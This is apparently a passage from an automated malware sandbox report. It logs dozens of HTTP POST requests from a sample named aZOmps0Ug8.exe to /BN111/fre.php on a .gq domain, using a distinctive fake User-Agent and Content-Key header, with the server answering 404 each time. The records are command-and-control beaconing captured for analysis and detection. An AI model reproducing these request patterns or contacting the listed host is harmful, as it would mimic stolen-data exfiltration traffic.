                      CF-RAY: 69dec1015b90702b-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      5192.168.2.649784172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:24.885116100 CEST1064OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:25.039886951 CEST1065INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:25 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TUPKE8D4UGkHYeoSd0yWKGHpiVyKRj77CORXDe0%2F1O83cFqfjhqZ0VrDKDJl5PNFM1d7k7a%2BakFbs2fwMXUXRPnpAD93uQfrQNlF5%2B5FUNRmWTFz4Fi75GfzaL9mPeByBQ%2BOUK4b0qNxYwgtN4fwhqW64C7hPA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debf578ab14e5c-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      50192.168.2.649878104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:35.265240908 CEST7813OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:35.384254932 CEST7814INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:35 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=68hgMnUBuHCsDUjLDFpqWCCQ2g0nALTKRqB%2BkiRtXAxjxPALNlT80KDT0GEMZAtpHUyMeDuNH4MC3L2MUas1uw3Tkjx5nm6dtpUi4kAfnIyf5i1cJw47x%2BYEBToHMbM6J5K1gQPhnXfkSWBbeb76%2Bs%2F4PqZQXA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec10f6862646d-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      51192.168.2.649883104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:36.968308926 CEST7820OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:37.123816013 CEST7823INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:37 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YUMi%2BKCQiebAYfk%2BBHidFFMjdX1L%2B1Iti6n0n9f53wMYFdVumBnToBBg78Fzogxr7V3VykOGcApOxm9l1ZNdwS3q1NBnlV56c4eet1gWdXUfPWzTFfWnX4HH4BnbmoIGtizbJCTdvwv6CXf3B0vdLyoWMpNG7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec11a19e04a7f-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      52192.168.2.649890104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:38.139185905 CEST7840OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:38.253525972 CEST7844INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:38 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=R6o5MMg7SbvUqktXOhLjA1Fnbswl29jahtPLPtZB%2F4x11eIb1xozO%2BsAnzF9weZv0qW6u4hDKdl%2FulXZxPK440HB6R9%2BHt10S57wJou4G%2B1ynyQn8M318af4%2FOta46SlgLFPdMQ9Fk1N%2Bbz9IjlO9LnEHUhfxw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1216ed06927-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      53192.168.2.649897104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:39.373198032 CEST7857OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:39.677830935 CEST7861INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:39 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hGTok4Pwn41ZRv1MumUHtTCRvKskuQeV7Tzz2LKP7TXQ%2BjHQX%2Bdc7hCUk0B93YW6i4W3l25Za7zFA9%2BUgikpTke7QSUXWzExiifQ89U8wsISzKRfHFHuLqm%2BOsRCRCWUlSjMQHz33ABcV%2F%2BHbvOmCP2te4WgCQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1291bfb6943-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      54192.168.2.649905172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:40.707680941 CEST7874OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:40.835604906 CEST7876INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:40 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1W6FUoErQkVxlBPw7%2BXATW83hqhBSlVS6%2FhzlhKejgcPspDjQWYsm3X5UX3pJCE9Ts7B%2BzefPUHY%2BB%2BB8iI5yQqS8bnXyeWA6pA0FPv3X6QGWOzitWjJfeequ1dvbp%2FoQG57ZdzOBYGjNXOLdmI%2FpOQ67mjazg%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1317c562c32-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      55192.168.2.649910104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:41.873661041 CEST7887OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:41.995091915 CEST7889INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:41 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GO6eCdCM4%2F6hA7dtd%2FoaiUrVjzpTaEYd0xVhp5YRWC%2BcFYd%2B827KZzyPcBHQZIMwEPE1lsx4Y%2FXrxohcjCmA2j%2FkkXNqUbdwkLVmbF7cdjV7n1NxRpQeMBRyy%2FLA0LTuL7Nvjpyb%2Buz9nG1ScVdle1E27JKKHw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec138b9821456-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      56192.168.2.649911104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:43.281959057 CEST7889OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:43.452020884 CEST7891INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:43 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CxsCHuzow%2F33c%2FCkji95GCcFRRddEjpXSTQlsgwfn1tNfjUG93xxIl1QFhyVjuOCfzG3xO4Dx0oqdciEFdAMIjFtDzSwsy%2BZAnBFJ%2BUIcvKJcPAL57TCTabS1rK7mISZlPofKYNa1NQhc21szCDAJAXGAw7LbA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec14189124e0d-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      57192.168.2.649912172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:44.429017067 CEST7891OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:44.601130962 CEST7893INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:44 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MFrv0XyktSeHA%2B%2FfE1zcEPcFFNmyDk1d8pBeW%2BPZ0DJJyDKM24IqF9Ua%2FLPJGa2QUt1%2F9p1PJhMy%2FqaXGD1%2FbCm79J0uGI0QAXTq9IQa9oVo94V3focmH3c91ymeJg1qFR1TPjejGWcfhJ7eFrLUoAL7XbrPtQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec148ba214e14-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      58192.168.2.649913172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:45.763144970 CEST7894OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:45.873655081 CEST7895INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:45 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RW1TGqFwuxrswdzsjqOAixFxJjq9GdKUdYo7aOj19dNBG4Lyyy7SsCmQykgjcONrTmazNouCKp2Z9hD9oj9zcv4osPlARNNPDj7pHenc2sXbowSWmyPcUlYaDlCHIFiv0mk3hl9DBkS9teWGWpN7dgSnssg4aw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1510989d70d-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      59192.168.2.649914172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:46.923367023 CEST7896OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:47.043380976 CEST7897INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:47 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tSBa4s2D4P4jpBx6UmblYjjTd9CZpovgF%2BPWqgNr38olq5O0aV%2BRwk6guUtz2KJcSkWnxUnrdqNk5vMbb8hVzaTtDOCB%2BcJpa1cxebjsNw2fxMN7oJxmUx78qf%2BG%2FL3VMFTIyyLXSMoDYeD9fnUR9J7qMZA67A%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1584bd8d729-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      6192.168.2.649785104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:26.025161982 CEST1066OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:26.179322958 CEST1067INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:26 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NBl2laSVW7g6vrcMW38%2F2YBxeOPQrkwxtPhBgARwSEgAQNN%2Fw9iGGS%2FMcVDd5bsPKDfZf7F34jWKWukgO%2BC6zW4jkS8RqojfmfBcKo9bpy3LJAKlcTfInQaxeHYOzrjAYApe5O2EWJUMAr1uyWTrEaztAHnaRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debf5eafe9695b-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      60192.168.2.649915172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:48.049870968 CEST7898OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:48.166955948 CEST7899INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:48 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9ZdGBK3Ox1p3BP97R4wYPo9%2BZ%2BK%2BUNVgFS7K2qZhwn3i65B5C5A3pC3HLkVBNXtwYCFsRF61IdHwby7cVDx52m03DlTnECOLo8Lmli9FT05kblnLTrBBndQTbweHp3wkkwehoYbNghK3zTDnn9Dwh%2FhMcQro9g%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec15f58a805f1-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      61192.168.2.649916172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:49.324402094 CEST7900OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:49.441760063 CEST7901INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:49 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VWWcbe3rqobGQ9zLXDZxDyBG75FOgSItYobuAtwDJpuAbL30zBatxbptze92UIC6gFoHQbenK4p440cH1CZduHVw9uJaoknjqoprxaW930U5gFR4LDNYtmvuhdpe4PmdBZYp9RJ3m58CjMFtKREDlk3%2FI4VSUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1674b4c2c3e-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      62192.168.2.649918104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:51.880553961 CEST7910OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:51.998187065 CEST7911INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:51 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BsMAOCkH1sJ0oabis0Q4paNtyJNrES9QQwxvqkXvAl%2FY7%2BLQH8xSnKIcHV%2BPPogWaqk3yG%2FJ6vxc%2FEk34SqAVeWUDw7vDSJQdrJh0Hz27m7Tiv3u6y6ahjT5NNVAW4JRx6Ib5AME7x%2F0Mc2jzF8N3OMd71mu%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1774cc64e3d-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      63192.168.2.649921172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:55.836602926 CEST7917OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:55.948838949 CEST7923INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:55 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LZ79cKido18sGHwuiNL%2F6O3gjFK34JZEyXZk1N8Qfy7pzHQIXqqquQIRfLJylWp%2Blb0ebXTVq%2F1bHmKtkJSRQAwrjU9cWyaKEY%2BfKI4BTUk6fnLRAUL796Gtr9VyUOxCK%2BmAyJmCSy2lit2HcTF7NC6%2BtJ15NA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1900cfd68ef-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      64192.168.2.649923104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:56.968339920 CEST7926OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:57.081579924 CEST7927INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:57 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MLALdhBf343n2G8LZLoDwb6Mh5vWVGbC472SfDfdBH%2B1zblvJJUUdQJELnMb%2Bod0RSTtp3nexN46I4MemNvht6DC79ZyaLJ9Tj8z0PlQvLxyWkeCuuJUc6JQy22HYxAbvcclmEPUk4DRcOjj7k3c%2FCX8oeDUlg%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1971aee4dbe-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      65192.168.2.649924104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:58.074973106 CEST7928OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:58.188767910 CEST7929INHTTP/1.1 404 Not Found
